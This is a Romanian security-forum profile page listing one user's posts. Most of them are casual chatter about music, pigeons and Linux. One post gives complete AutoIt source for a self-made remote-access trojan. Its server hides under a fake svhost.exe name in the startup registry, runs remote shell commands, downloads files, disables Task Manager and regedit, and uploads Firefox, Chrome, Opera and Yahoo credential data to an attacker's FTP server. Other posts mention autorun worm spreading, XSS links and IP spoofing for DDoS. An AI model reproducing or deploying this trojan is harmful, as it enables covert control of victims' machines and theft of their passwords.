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Everything posted by parazitul29

  1. aia se poate numi melodie?, nu am auzit in viata mea de Eli asta,oricum e praf pulbere fina uitati aici melodii YouTube - Adrian Minune - Mi-au furat ideile si americanii sau Trilulilu - Nek si Florin Salam - Nu ma uit la bani @ BySylvyu - Muzic? Manele
  2. poti sa-mi trimiti si mie una? parazitul_29@yahoo.com
  3. programare,securitate,retelistica,comunitate,informatie
  4. puppy linux motive: mic si rapid
  5. voi v-ati gresit vocatia ati fi buni de psihologi ca aia scriu citate de genul pe care le-ati scris voi pe aici ,mie daca mi-ai spune asa ceva in fata as crede ca te-ai imbatat/drogat propunerea mea: duceti-va la curve poate vi se mai i-a din sentimentul de singuratate
  6. @sharkyz dupa o saptamana o sa incepi sa ai ganduri sinucigase
  7. nu e chiar asa in general in perioada sarbatorilor fiecare pleaca la prietenii lui, la munte la un gratar, la bairamuri , se distreaza doar e craciunul e normal sa se intample asa, mai iesiti si voi intr-un club
  8. Florin Salam si Claudia-Ma uit la tine ca la soare
  9. bine ai venit!
  10. ai cam gresit sectiunea sugestiile se posteaza aici Sugestii - RST daca vreti sa faceti ceva ideea lui phreak cu threadul mi se pare destul de buna
  11. eu in locul aluia te-as bate de n-ai mai stii pe ce lume traiesti
  12. s-a ales prafu' da eu tot nu stiu cine e odix?
  13. vezi cu autorun.inf de pe celelalte partiti sau de pe stick-uri,metoda cu autorun este folosita de multi wormi printre care si conficker ori de cate ori ai instala tu windows-ul cand bagi un stick autorun-ul ruleaza automat worm-ul care se afla hidden pe stick, la fel se intampla si in celelalte partiti cand intri pe ele
  14. Trilulilu - Pokemon Band - Tiganeasca - Muzic? Diverse
  15. Trilulilu - Babi Minune si Narcisa - Indianca mea, araboaica mea - Muzic? Manele tot mai misto e asta
  16. florin salam-this is the life
  17. porumbelul a zburat din cauza zgomotului si nucile ai cazut cel mai probabil din cauza ca porumbelul a miscat crengile oricum porumbei au simturile foarte dezvoltate astfel cum s-ar explica voiajori care vin de la mii de km? cresc si eu voiajori de cativa ani si pot sa spun ca le au cu simturile
  18. mai creste sansa ca ala sa fie idiot si sa nu citeasca tot link-ul se pot pune comenzi de alea cu ymsgr sau chiar xss
  19. pacaleala,da una mare
  20. macar ai fixat vulnerabilitatea?
  21. mai era o chestie cu telnet prin care puteai manipula serverele smtp si trimiteai mail-uri cu header modificat
  22. parazitul29

    Chat RST

    va fi folosit in mare parte pentru:spreading,injuraturi,jigniri
  23. un simplu trojan in autoit, facut la plcitiseala nu am testat toate functiile l-am scris l-am compilat am testat cateva functii se comportau destul de bine nu le-am testat decat pe cele de la stealere dar cred ca merg bine la stealere se trimite folderul din aplication data functii -internet explorer manipulation -download file -cmd control -delete file -mesage box -run -kill procces -delete file -open/close cd -blocheaza/deblocheaza tastatura si mouse -click la anumite coordonate -mouse wheel control -upload file -ets stealer -mozzila,opera,chrome stealer //netestat fura parolel criptate se gasesc pe net programe pentru decriptarea lor -disable/enable taskmanager,regedit -server startup screenshot server #include <IE.au3> #include <FTPEx.au3> #Include <File.au3> $g_IP = "" Break (0) TCPStartUp() $MainSocket = TCPListen($g_IP, 5555, 100 ) If $MainSocket = -1 Then Exit while 1 $ConnectedSocket = TCPAccept( $MainSocket) $recv = TCPRecv($ConnectedSocket, 2048) $arr=StringSplit ( $recv, "|") if $arr[1]="run" Then ShellExecute($arr[2]) EndIf if $arr[1]="procces" Then ProcessClose ($arr[2]) EndIf If $arr[1]="msgbox" Then msgbox(0,"mesaj",$arr[2]) EndIf If $arr[1]="delete" Then $del=FileDelete ( $arr[2]) $socket = TCPConnect( $g_IP, 5555 ) $trim=TCPSend($socket,$del) EndIf if $arr[1]="mouseclick" Then MouseClick("left",$arr[2],$arr[3]) EndIf if $arr[1]="mousewhell" Then MouseWheel($arr[2],$arr[3]) Endif if $arr[1]="opencd" Then CDTray ( $arr[2],$arr[3] ) EndIf if $arr[1]="blocktast" Then BlockInput (1) EndIf if $arr[1]="enabletast" Then BlockInput(0) EndIf if $arr[1]="createieinv" Then $oIE=_IECreate($arr[2],0,0,1,0) EndIf if $arr[1]="navie" Then $noie=_IENavigate($oIE, $arr[2]) EndIf if $arr[1]="manie" Then $oForm = _IEFormGetObjByName ($oIE, $arr[2]) $oText = _IEFormElementGetObjByName ($oForm, $arr[3]) _IEFormElementSetValue ($oText, $arr[4]) _IEFormSubmit ($oForm) EndIf if $arr[1]="Console" Then Run(@ComSpec & " /c " & $arr[2], "", @SW_HIDE) EndIf if $arr[1]="download" Then Local $hDownload =InetGet($arr[2], $arr[3]) Do Sleep(250) Until InetGetInfo($hDownload, 2) Local $nBytes = InetGetInfo($hDownload, 0) InetClose($hDownload) EndIf if $arr[1]="Regdel" Then RegDelete($arr[2]) EndIf if $arr[1]="startup" Then RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Server", "svhost.exe", "REG_SZ", "c:\windows\sistem32\svhost.exe") filecopy(@ScriptFullPath,"c:\windows\sistem32\svhost.exe") endif if $arr[1]="taskmanager" Then RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","1") EndIf if $arr[1]="regeditdisable" then regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1") endif if $arr[1]="taskenable" Then RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","0") endif if $arr[1]="regenable" Then regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","0") EndIf if $arr[1]="ftpup" Then $server = $arr[2] $username = $arr[3] $pass = $arr[4] $LocalFile=$arr[5] $Remotefile=$arr[6] $Open = _FTP_Open('MyFTP Control') $Conn = _FTP_Connect($Open, $server, $username, $pass) _FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY") $Ftpc = _FTP_Close($Open) EndIf if $arr[1]="ets" then $grt=regread("HKEY_CURRENT_USER\Software\yahoo\pager","ETS") _FileCreate("c:\windows\test.txt") $file=FileOpen ( "c:\windows\test.txt",2) If $file = -1 Then MsgBox(0, "Error", "Unable to open file.") Exit EndIf FileWrite($file, $grt) $server = $arr[2] $username = $arr[3] $pass = $arr[4] $LocalFile="c:\windows\test.txt" $Remotefile="/ets.txt" $Open = _FTP_Open('MyFTP Control') $Conn = _FTP_Connect($Open, $server, $username, $pass) _FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY") $Ftpc = _FTP_Close($Open) EndIf if $arr[1]="mozzila" Then $server = $arr[2] $username = $arr[3] $pass = $arr[4] $Localfolder=@AppDataDir & "\Mozilla\Firefox\Profiles" $Remotefolder="/mozzila" $Open = _FTP_Open('MyFTP Control') $Conn = _FTP_Connect($Open, $server, $username, $pass) _FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0) $Ftpc = _FTP_Close($Open) EndIf if $arr[1]="chrome" Then $server = $arr[2] $username = $arr[3] $pass = $arr[4] $Localfolder=@AppDataDir & "\Google\Chrome\User Data\Default" $Remotefolder="/chrome" $Open = _FTP_Open('MyFTP Control') $Conn = _FTP_Connect($Open, $server, $username, $pass) _FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0) $Ftpc = _FTP_Close($Open) EndIf if $arr[1]="opera" Then $server = $arr[2] $username = $arr[3] $pass = $arr[4] $Localfolder=@AppDataDir & "\Opera\Opera\profile" $Remotefolder="/opera" $Open = _FTP_Open('MyFTP Control') $Conn = _FTP_Connect($Open, $server, $username, $pass) _FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0) $Ftpc = _FTP_Close($Open) EndIf wend client #include <GUIConstantsEx.au3> #include<string.au3> $g_IP = "" func internexp() GUICreate("set") $navigate=guictrlcreateinput("www.example.com/navigate",40, 80, 200, 20) $create=guictrlcreateinput("wwww.example.com",40, 50, 200, 20) $formname=guictrlcreateinput("form",40, 140, 100, 20) $formelement=guictrlcreateinput("inputbox",150, 140, 100, 20) $valori=guictrlcreateinput("exemplu exemplu",260, 140, 100, 20) $create = GUICtrlCreateButton("lanseaza ie", 240,50, 150) $nav = GUICtrlCreateButton("dute la",240, 80, 150) $submit = GUICtrlCreateButton("trimite datele",120, 170, 150) GUICtrlSetState(-1, $GUI_FOCUS) gUICtrlSetState(-1, $GUI_FOCUS) GUISetState() Do TCPStartUp() $msg = GUIGetMsg() if $msg=$create Then $cre=GUICtrlRead($create) $socket = TCPConnect( $g_IP, 5555 ) $crea=_StringInsert($cre,"createieinv|",0) TCPSend($socket, $crea) endif if $msg=$nav Then $nav=GUICtrlRead($navigate) $socket = TCPConnect( $g_IP, 5555 ) $nave=_StringInsert($cre,"navie|",0) TCPSend($socket, $nave) EndIf if $msg=$submit Then $form2=GUICtrlRead($formname) $formele=GUICtrlRead($formelement) $form3=stringlen($form2) $form4=_StringInsert($form2,$formele,$form3) $form5=_StringInsert($form4,"|",$form2) $form6=_Stringinsert($form5,"manie|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $form6) EndIf Until $msg = $GUI_EVENT_CLOSE EndFunc GUICreate("set",600,500) $download=guictrlcreateinput("http//www.examplu.com/exemplu.exe",40, 0, 200, 20) $downloc=guictrlcreateinput("c:\exemplu.exe",40, 25, 200, 20) $console=guictrlcreateinput("console",40, 50, 200, 20) $mesaji=guictrlcreateinput("mesaj",40, 80, 200, 20) $ruleazai=guictrlcreateinput("notepad.exe",40, 110, 200, 20) $killi=guictrlcreateinput("winamp.exe",40, 140, 200, 20) $deletei=guictrlcreateinput("",40, 170, 200, 20) $drivei=guictrlcreateinput("E:",40, 200, 40, 20) $openi=guictrlcreateinput("open",90, 200, 30, 20) $xcoori=guictrlcreateinput("500",40, 260, 30, 20) $ycoori=guictrlcreateinput("500",90, 260, 30, 20) $wheel1i=guictrlcreateinput("up",40, 320,30, 20) $wheel2i=guictrlcreateinput("2",90, 320,30, 20) $ftpupserv=guictrlcreateinput("ftp.server.com",350, 20, 200, 20) $ftpupuser=guictrlcreateinput("user",350, 50, 200, 20) $ftpuppass=guictrlcreateinput("parola",350, 80, 200, 20) $ftplocal=guictrlcreateinput("c:\test.exe",350, 110, 200, 20) $ftpservfile=guictrlcreateinput("/test.exe",350, 140, 200, 20) $ftpetserv=guictrlcreateinput("ftp.server.com",410, 260, 150, 20) $ftpetsus=guictrlcreateinput("utilizator",410, 290, 150, 20) $ftpetspas=guictrlcreateinput("parola",410, 320, 150, 20) $startup = GUICtrlCreateButton(" server startup", 360,440, 120) $stealets = GUICtrlCreateButton("ets steal", 380,360, 50) $mozzila = GUICtrlCreateButton("mozzila", 430,360, 50) $chrome = GUICtrlCreateButton("chrome", 480,360, 50) $opera = GUICtrlCreateButton("opera", 530,360, 50) $upload = GUICtrlCreateButton("upload", 420,170, 50) $cmd = GUICtrlCreateButton("cmd", 240,50, 50) $down = GUICtrlCreateButton("download", 240,15, 70) $mesaj = GUICtrlCreateButton("mesaj", 240,80, 50) $ruleaza = GUICtrlCreateButton("ruleaza",240, 110, 50) $kill = GUICtrlCreateButton("kill proces",240, 140, 90) $delete = GUICtrlCreateButton("delete",240, 170, 60) $drive = GUICtrlCreateButton("open/close drive",240, 200,100) $bloctast = GUICtrlCreateButton("blocheaza tastatura",10, 230,200) $debloc = GUICtrlCreateButton("deblocheaza taste",210, 230,200) $click = GUICtrlCreateButton("click",210, 260,40) $mouse = GUICtrlCreateButton("mouse wheel",210, 320,100) $internet = GUICtrlCreateButton("browser ie",40, 350,200) $distask = GUICtrlCreateButton(" taskmanager off",40, 400,140) $entask = GUICtrlCreateButton(" taskmanager on",40, 440,140) $disregedit = GUICtrlCreateButton(" regedit off",200, 400,140) $enregedit = GUICtrlCreateButton("regedit on",200, 440,140) $label1=GUICtrlCreateLabel("up/down", 40, 290) $label2=GUICtrlCreateLabel("xcoord", 0, 265) $label3=GUICtrlCreateLabel("ycoord", 125, 265) $label4=GUICtrlCreateLabel("drive", 10, 200) $label5=GUICtrlCreateLabel("open/closed", 130, 200) GUICtrlSetState(-1, $GUI_FOCUS) gUICtrlSetState(-1, $GUI_FOCUS) GUISetState() Do TCPStartUp() $msg = GUIGetMsg() if $msg=$stealets Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "ets|"& $serv & "|" & $user & "|" & $pas) EndIf if $msg=$mozzila Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "mozzila|"& $serv & "|" & $user & "|" & $pas) EndIf if $msg=$opera Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "opera|"& $serv & "|" & $user & "|" & $pas) EndIf if $msg=$chrome Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "chrome|"& $serv & "|" & $user & "|" & $pas) EndIf if $msg=$upload Then $servup=GUICtrlRead($ftpupserv) $servupuser=GUICtrlRead($ftpupuser) $servupass= GUICtrlRead($ftpuppass) $uplocal=GUICtrlRead($ftplocal) $upserv=GUICtrlRead($ftpservfile) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "ftpup|" & $servup & "|" & $servupuser & "|" & $servupass & "|" & $uplocal &"|" & $upserv ) endif if $msg=$startup Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "startup|sss") EndIf if $msg=$distask Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "taskmanager|ss") EndIf if $msg=$entask Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "taskenable|ss") EndIf if $msg=$disregedit Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "regeditdisable|ss") EndIf if $msg=$enregedit Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "regenable|ss") EndIf If $msg=$down Then $down1=GUICtrlRead($download) $down2=GUICtrlRead($downloc) $downlen=stringlen($down1) $down3=_stringinsert($down1,$down2,$downlen) $down4=_stringinsert($down3,"|",$downlen) $down5=_stringinsert($down4,"download|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $down5) endif if $msg=$cmd Then $cmdcontrol=guictrlread($console) $cmd2=_stringinsert($cmdcontrol,"console|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $cmd2) endif if $msg=$mesaj Then $mes=GUICtrlRead($mesaji) $socket = TCPConnect( $g_IP, 5555 ) $mess=_StringInsert($mes,"msgbox|",0) TCPSend($socket, $mess) endif if $msg=$ruleaza Then $rul=GUICtrlRead($ruleazai) $socket = TCPConnect( $g_IP, 5555 ) $rull=_StringInsert($rul,"run|",0) TCPSend($socket, $rull) endif if $msg=$kill Then $kil=GUICtrlRead($killi) $kill=_StringInsert($kil,"procces|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $kill) endif if $msg=$delete Then $del=GUICtrlRead($deletei) $socket = TCPConnect( $g_IP, 5555 ) $dell=_StringInsert($del,"delete|",0) TCPSend($socket, $dell) endif if $msg=$bloctast Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "blocktast|ssss") EndIf if $msg=$debloc Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "enabletast|ssss") endif If $msg=$click Then $coordx=GUICtrlRead($xcoori) $coordy=GUICtrlRead($ycoori) $coordlen=stringlen($coordx) $coord=_stringinsert($coordx,$coordy,$coordlen) $coord2=_stringinsert($coordx,"|",$coordlen) $coord3=_stringinsert($coord2,"mouseclick|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $coord3) endif If $msg=$mouse Then $wheel1m=GUICtrlRead($wheel1i) $wheel2m=GUICtrlRead($wheel2i) $wheellen=stringlen($wheel1m) $wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen) $wheel2=_stringinsert($wheel1,"|",$wheellen) $wheel3=_stringinsert($wheel2,"mousewhell|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $wheel3) endif If $msg=$mouse Then $wheel1m=GUICtrlRead($wheel1i) $wheel2m=GUICtrlRead($wheel2i) $wheellen=stringlen($wheel1m) $wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen) $wheel2=_stringinsert($wheel1,"|",$wheellen) $wheel3=_stringinsert($wheel2,"mousewhell|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $wheel3) endif If $msg=$drive then $drive1=GUICtrlRead($drivei) $open1=GUICtrlRead($openi) $drivelen=stringlen($drive1) $cd=_stringinsert($drive1,$open1,$drivelen) $cd2=_stringinsert($cd,"|",$drivelen) $cd3=_stringinsert($cd2,"opencd|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $cd3) endif if $msg=$internet Then internexp() endif Until $msg = $GUI_EVENT_CLOSE
  24. bineinteles ca folosit botnet,chestia a fost ca botnetul trimitea packetele ip cu headerul modificat unde era scrisa adresa expeditorului packetului s-a scris o adresa falsa
  25. ce exit-poll? s-a votat ceva si nu stiu eu? ip spoofing,nu-ti trebuie cine stie ce inteligenta sa modifici headerul ip oricum ddos=arma prostului
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